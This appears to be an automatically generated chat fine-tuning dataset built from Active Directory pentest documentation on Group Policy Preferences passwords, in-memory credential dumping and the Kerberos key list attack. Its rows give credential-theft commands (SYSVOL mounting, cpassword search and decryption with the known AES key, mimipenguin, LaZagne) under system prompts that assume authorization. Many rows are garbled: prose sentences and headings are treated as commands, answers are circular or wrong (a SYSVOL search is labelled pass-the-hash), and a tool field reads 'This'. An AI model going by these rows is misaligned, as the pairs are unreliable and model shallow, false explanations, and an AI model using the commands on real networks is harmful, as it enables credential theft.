[pypykatz](https://github.com/skelsec/pypykatz) (Python) and [gpp-decrypt](https://github.com/BustedSec/gpp-decrypt) (Ruby) can then be used to decrypt the matches.", "metadata": {"corpus_index": 300, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Alternatively, searching for passwords can be done manually (or with Metasploit's `smb_enum_gpp` module), however it requires mounting the `SYSVOL` share, which can't be done through a docker environment unless it's run with privileged rights.`?"}, {"role": "assistant", "content": "This command is used for pass-the-hash. pass-the-hash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Alternatively, searching for passwords can be done manually (or with Metasploit's `smb_enum_gpp` module), however it requires mounting the `SYSVOL` share, which can't be done through a docker environment unless it's run with privileged rights.`?", "response": "This command is used for pass-the-hash. pass-the-hash", "metadata": {"corpus_index": 300, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of mount the SYSVOL share"}, {"role": "assistant", "content": "sudo mount\\\n -o domain='domain.local'\\\n -o username='someuser'\\\n -o password='password'\\\n -t cifs\\\n '//domain_controller/SYSVOL'\\\n /tmp/sysvol"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of mount the SYSVOL share", "response": "sudo mount\\\n -o domain='domain.local'\\\n -o username='someuser'\\\n -o password='password'\\\n -t cifs\\\n '//domain_controller/SYSVOL'\\\n /tmp/sysvol", "metadata": {"corpus_index": 301, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out mount the SYSVOL share during a pentest?"}, {"role": "assistant", "content": "sudo mount\\\n -o domain='domain.local'\\\n -o username='someuser'\\\n -o password='password'\\\n -t cifs\\\n '//domain_controller/SYSVOL'\\\n /tmp/sysvol"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out mount the SYSVOL share during a pentest?", "response": "sudo mount\\\n -o domain='domain.local'\\\n -o username='someuser'\\\n -o password='password'\\\n -t cifs\\\n '//domain_controller/SYSVOL'\\\n /tmp/sysvol", "metadata": {"corpus_index": 301, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain recursively look for \"cpassword\" in Group Policies"}, {"role": "assistant", "content": "sudo grep -ria cpassword /tmp/sysvol/'domain.local'/Policies/ 2>/dev/null"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain recursively look for \"cpassword\" in Group Policies", "response": "sudo grep -ria cpassword /tmp/sysvol/'domain.local'/Policies/ 2>/dev/null", "metadata": {"corpus_index": 302, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform recursively look for \"cpassword\" in Group Policies?"}, {"role": "assistant", "content": "sudo grep -ria cpassword /tmp/sysvol/'domain.local'/Policies/ 2>/dev/null"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform recursively look for \"cpassword\" in Group Policies?", "response": "sudo grep -ria cpassword /tmp/sysvol/'domain.local'/Policies/ 2>/dev/null", "metadata": {"corpus_index": 302, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about decrypt the string and recover the password"}, {"role": "assistant", "content": "pypykatz gppass j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw\ngpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw\n``\n\n=== Windows\n\nFrom Windows systems, the GPP password can only be recovered from an authenticated (i.e. domain user) context (see impersonation).\n\nPowerSploit's Get-GPPPassword searches a Domain Controller's SYSVOL share Groups.xml, Services.xml, Scheduledtasks.xml, DataSources.xml, Printers.xml and Drives.xml files and returns plaintext passwords\n\n`bash\nImport-Module .\\Get-GPPPassword.ps1\nGet-GPPPassword\n`\n\nThis can also be achieved without tools, by \"manually\" looking for the cpassword string in xml files and by then manually decrypting the matches.\n\n`bash\nfindstr /S cpassword %logonserver%\\sysvol*.xml\n`\n\nThe decryption process is as follows\n\n`\n1. decode from base64\n2. decrypt from AES-256-CBC the following hex key/iv\n Key : 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b\n IV : 0000000000000000000000000000000\n3. decode from UTF-16LE\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about decrypt the string and recover the password", "response": "pypykatz gppass j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw\ngpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw\n``\n\n=== Windows\n\nFrom Windows systems, the GPP password can only be recovered from an authenticated (i.e. domain user) context (see impersonation).\n\nPowerSploit's Get-GPPPassword searches a Domain Controller's SYSVOL share Groups.xml, Services.xml, Scheduledtasks.xml, DataSources.xml, Printers.xml and Drives.xml files and returns plaintext passwords\n\n`bash\nImport-Module .\\Get-GPPPassword.ps1\nGet-GPPPassword\n`\n\nThis can also be achieved without tools, by \"manually\" looking for the cpassword string in xml files and by then manually decrypting the matches.\n\n`bash\nfindstr /S cpassword %logonserver%\\sysvol*.xml\n`\n\nThe decryption process is as follows\n\n`\n1. decode from base64\n2. decrypt from AES-256-CBC the following hex key/iv\n Key : 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b\n IV : 0000000000000000000000000000000\n3. decode from UTF-16LE\n``\n\n:::", "metadata": {"corpus_index": 303, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform decrypt the string and recover the password?"}, {"role": "assistant", "content": "pypykatz gppass j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw\ngpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw\n``\n\n=== Windows\n\nFrom Windows systems, the GPP password can only be recovered from an authenticated (i.e. domain user) context (see impersonation).\n\nPowerSploit's Get-GPPPassword searches a Domain Controller's SYSVOL share Groups.xml, Services.xml, Scheduledtasks.xml, DataSources.xml, Printers.xml and Drives.xml files and returns plaintext passwords\n\n`bash\nImport-Module .\\Get-GPPPassword.ps1\nGet-GPPPassword\n`\n\nThis can also be achieved without tools, by \"manually\" looking for the cpassword string in xml files and by then manually decrypting the matches.\n\n`bash\nfindstr /S cpassword %logonserver%\\sysvol*.xml\n`\n\nThe decryption process is as follows\n\n`\n1. decode from base64\n2. decrypt from AES-256-CBC the following hex key/iv\n Key : 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b\n IV : 0000000000000000000000000000000\n3. decode from UTF-16LE\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform decrypt the string and recover the password?", "response": "pypykatz gppass j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw\ngpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw\n``\n\n=== Windows\n\nFrom Windows systems, the GPP password can only be recovered from an authenticated (i.e. domain user) context (see impersonation).\n\nPowerSploit's Get-GPPPassword searches a Domain Controller's SYSVOL share Groups.xml, Services.xml, Scheduledtasks.xml, DataSources.xml, Printers.xml and Drives.xml files and returns plaintext passwords\n\n`bash\nImport-Module .\\Get-GPPPassword.ps1\nGet-GPPPassword\n`\n\nThis can also be achieved without tools, by \"manually\" looking for the cpassword string in xml files and by then manually decrypting the matches.\n\n`bash\nfindstr /S cpassword %logonserver%\\sysvol*.xml\n`\n\nThe decryption process is as follows\n\n`\n1. decode from base64\n2. decrypt from AES-256-CBC the following hex key/iv\n Key : 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b\n IV : 0000000000000000000000000000000\n3. decode from UTF-16LE\n``\n\n:::", "metadata": {"corpus_index": 303, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through decrypt the string and recover the password"}, {"role": "assistant", "content": "=== Windows\n\nFrom Windows systems, the GPP password can only be recovered from an authenticated (i.e. domain user) context (see [impersonation](../impersonation.md)).\n\n[PowerSploit](https://github.com/PowerShellMafia/PowerSploit/)'s [Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1) searches a Domain Controller's SYSVOL share `Groups.xml`, `Services.xml`, `Scheduledtasks.xml`, `DataSources.xml`, `Printers.xml` and `Drives.xml` files and returns plaintext passwords"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through decrypt the string and recover the password", "response": "=== Windows\n\nFrom Windows systems, the GPP password can only be recovered from an authenticated (i.e. domain user) context (see [impersonation](../impersonation.md)).\n\n[PowerSploit](https://github.com/PowerShellMafia/PowerSploit/)'s [Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1) searches a Domain Controller's SYSVOL share `Groups.xml`, `Services.xml`, `Scheduledtasks.xml`, `DataSources.xml`, `Printers.xml` and `Drives.xml` files and returns plaintext passwords", "metadata": {"corpus_index": 304, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for decrypt the string and recover the password. decrypt the string and recover the password"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for decrypt the string and recover the password. decrypt the string and recover the password", "metadata": {"corpus_index": 304, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the This command to decrypt the string and recover the password"}, {"role": "assistant", "content": "This can also be achieved without tools, by \"manually\" looking for the `cpassword` string in xml files and by then manually decrypting the matches."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the This command to decrypt the string and recover the password", "response": "This can also be achieved without tools, by \"manually\" looking for the `cpassword` string in xml files and by then manually decrypting the matches.", "metadata": {"corpus_index": 305, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "This"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for decrypt the string and recover the password?"}, {"role": "assistant", "content": "This can also be achieved without tools, by \"manually\" looking for the `cpassword` string in xml files and by then manually decrypting the matches."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for decrypt the string and recover the password?", "response": "This can also be achieved without tools, by \"manually\" looking for the `cpassword` string in xml files and by then manually decrypting the matches.", "metadata": {"corpus_index": 305, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `This can also be achieved without tools, by \"manually\" looking for the `cpassword` string in xml files and by then manually decrypting the matches.`?"}, {"role": "assistant", "content": "This command is used for decrypt the string and recover the password. decrypt the string and recover the password"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `This can also be achieved without tools, by \"manually\" looking for the `cpassword` string in xml files and by then manually decrypting the matches.`?", "response": "This command is used for decrypt the string and recover the password. decrypt the string and recover the password", "metadata": {"corpus_index": 305, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the The command to decrypt the string and recover the password"}, {"role": "assistant", "content": "The decryption process is as follows"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the The command to decrypt the string and recover the password", "response": "The decryption process is as follows", "metadata": {"corpus_index": 306, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for decrypt the string and recover the password?"}, {"role": "assistant", "content": "The decryption process is as follows"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for decrypt the string and recover the password?", "response": "The decryption process is as follows", "metadata": {"corpus_index": 306, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The decryption process is as follows`?"}, {"role": "assistant", "content": "This command is used for decrypt the string and recover the password. decrypt the string and recover the password"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The decryption process is as follows`?", "response": "This command is used for decrypt the string and recover the password. decrypt the string and recover the password", "metadata": {"corpus_index": 306, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/group-policies-preferences.md", "page_title": "Group Policy Preferences", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is In-memory secrets - Theory?"}, {"role": "assistant", "content": "Just like the LSASS process on Windows systems allowing for LSASS dumping, some programs sometimes handle credentials in the memory allocated to their processes, sometimes allowing attackers to dump them."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is In-memory secrets - Theory?", "response": "Just like the LSASS process on Windows systems allowing for LSASS dumping, some programs sometimes handle credentials in the memory allocated to their processes, sometimes allowing attackers to dump them.", "metadata": {"corpus_index": 307, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/in-memory.md", "page_title": "In-memory secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do In-memory secrets - Theory"}, {"role": "assistant", "content": "Just like the LSASS process on Windows systems allowing for LSASS dumping, some programs sometimes handle credentials in the memory allocated to their processes, sometimes allowing attackers to dump them."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do In-memory secrets - Theory", "response": "Just like the LSASS process on Windows systems allowing for LSASS dumping, some programs sometimes handle credentials in the memory allocated to their processes, sometimes allowing attackers to dump them.", "metadata": {"corpus_index": 307, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/in-memory.md", "page_title": "In-memory secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about In-memory secrets - Practice"}, {"role": "assistant", "content": "> [!TIP]\n> Just like LSASS dumping, this technique needs the attacker to have admin access on the target machine since it involves dumping and handling volatile memory.\n\n::: tabs\n\n=== UNIX-like\nOn UNIX-like systems, tools like mimipenguin (C, Shell, Python), mimipy (Python) and LaZagne (Python) can be used to extract passwords from memory.\n\n``bash\nmimipenguin\nlaZagne memory\n``\n=== Windows\n\nOn Windows systems, tools like LaZagne (Python) and mimikatz (C) can be used to extract passwords from memory but they focus on LSASS dumping.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about In-memory secrets - Practice", "response": "> [!TIP]\n> Just like LSASS dumping, this technique needs the attacker to have admin access on the target machine since it involves dumping and handling volatile memory.\n\n::: tabs\n\n=== UNIX-like\nOn UNIX-like systems, tools like mimipenguin (C, Shell, Python), mimipy (Python) and LaZagne (Python) can be used to extract passwords from memory.\n\n``bash\nmimipenguin\nlaZagne memory\n``\n=== Windows\n\nOn Windows systems, tools like LaZagne (Python) and mimikatz (C) can be used to extract passwords from memory but they focus on LSASS dumping.\n\n:::", "metadata": {"corpus_index": 308, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/in-memory.md", "page_title": "In-memory secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for In-memory secrets - Practice"}, {"role": "assistant", "content": "> [!TIP]\n> Just like LSASS dumping, this technique needs the attacker to have admin access on the target machine since it involves dumping and handling volatile memory.\n\n::: tabs\n\n=== UNIX-like\nOn UNIX-like systems, tools like mimipenguin (C, Shell, Python), mimipy (Python) and LaZagne (Python) can be used to extract passwords from memory.\n\n``bash\nmimipenguin\nlaZagne memory\n``\n=== Windows\n\nOn Windows systems, tools like LaZagne (Python) and mimikatz (C) can be used to extract passwords from memory but they focus on LSASS dumping.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for In-memory secrets - Practice", "response": "> [!TIP]\n> Just like LSASS dumping, this technique needs the attacker to have admin access on the target machine since it involves dumping and handling volatile memory.\n\n::: tabs\n\n=== UNIX-like\nOn UNIX-like systems, tools like mimipenguin (C, Shell, Python), mimipy (Python) and LaZagne (Python) can be used to extract passwords from memory.\n\n``bash\nmimipenguin\nlaZagne memory\n``\n=== Windows\n\nOn Windows systems, tools like LaZagne (Python) and mimikatz (C) can be used to extract passwords from memory but they focus on LSASS dumping.\n\n:::", "metadata": {"corpus_index": 308, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/in-memory.md", "page_title": "In-memory secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the mimipenguin command for in-memory secrets - practice"}, {"role": "assistant", "content": "mimipenguin\nlaZagne memory"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the mimipenguin command for in-memory secrets - practice", "response": "mimipenguin\nlaZagne memory", "metadata": {"corpus_index": 309, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/in-memory.md", "page_title": "In-memory secrets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "mimipenguin"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out In-memory secrets - Practice during a pentest?"}, {"role": "assistant", "content": "mimipenguin\nlaZagne memory"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out In-memory secrets - Practice during a pentest?", "response": "mimipenguin\nlaZagne memory", "metadata": {"corpus_index": 309, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/in-memory.md", "page_title": "In-memory secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `mimipenguin`?"}, {"role": "assistant", "content": "This command is used for in-memory secrets - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `mimipenguin`?", "response": "This command is used for in-memory secrets - practice. Practice", "metadata": {"corpus_index": 309, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/in-memory.md", "page_title": "In-memory secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Dumping work?"}, {"role": "assistant", "content": "When gaining control of a computer or account, useful information can often be obtained, sometimes leading to the compromise of additional objects. Many techniques can be carried out for credential dumping (either in the form of plaintext passwords, hashed passwords, or tickets)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Dumping work?", "response": "When gaining control of a computer or account, useful information can often be obtained, sometimes leading to the compromise of additional objects. Many techniques can be carried out for credential dumping (either in the form of plaintext passwords, hashed passwords, or tickets).", "metadata": {"corpus_index": 310, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/index.md", "page_title": "Dumping", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Dumping"}, {"role": "assistant", "content": "When gaining control of a computer or account, useful information can often be obtained, sometimes leading to the compromise of additional objects. Many techniques can be carried out for credential dumping (either in the form of plaintext passwords, hashed passwords, or tickets)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Dumping", "response": "When gaining control of a computer or account, useful information can often be obtained, sometimes leading to the compromise of additional objects. Many techniques can be carried out for credential dumping (either in the form of plaintext passwords, hashed passwords, or tickets).", "metadata": {"corpus_index": 310, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/index.md", "page_title": "Dumping", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Kerberos key list - Theory"}, {"role": "assistant", "content": "It is possible to retrieve the long term secret of a user (e.g. NT hash) by sending a TGS-REQ (service ticket request) to the KRBTGT service with a KERB-KEY-LIST-REQ message type. This was introduced initially to support SSO with legacy protocols (e.g. NTLM) with Azure AD on on-premises resources.\n\nAn attacker can abuse this by forging a RODC golden ticket for a target user and use it to send a TGS-REQ to the KRBTGT service with a padata filed value of 161 (KERB-KEY-LIST-REQ). Knowing the KRBTGT key of the RODC is required here. The TGS-REP will contain the long term secret of the user in the KERB-KEY-LIST-REP key value."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Kerberos key list - Theory", "response": "It is possible to retrieve the long term secret of a user (e.g. NT hash) by sending a TGS-REQ (service ticket request) to the KRBTGT service with a KERB-KEY-LIST-REQ message type. This was introduced initially to support SSO with legacy protocols (e.g. NTLM) with Azure AD on on-premises resources.\n\nAn attacker can abuse this by forging a RODC golden ticket for a target user and use it to send a TGS-REQ to the KRBTGT service with a padata filed value of 161 (KERB-KEY-LIST-REQ). Knowing the KRBTGT key of the RODC is required here. The TGS-REP will contain the long term secret of the user in the KERB-KEY-LIST-REP key value.", "metadata": {"corpus_index": 311, "category": "active_directory", "source_file": "docs/src/ad/movement/credentials/dumping/kerberos-key-list.md", "page_title": "Kerberos key list", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Kerberos key list - Theory"}, {"role": "assistant", "content": "It is possible to retrieve the long term secret of a user (e.g. NT hash) by sending a TGS-REQ (service ticket request) to the KRBTGT service with a KERB-KEY-LIST-REQ message type. This was introduced initially to support SSO with legacy protocols (e.g. NTLM) with Azure AD on on-premises resources.\n\nAn attacker can abuse this by forging a RODC golden ticket for a target user and use it 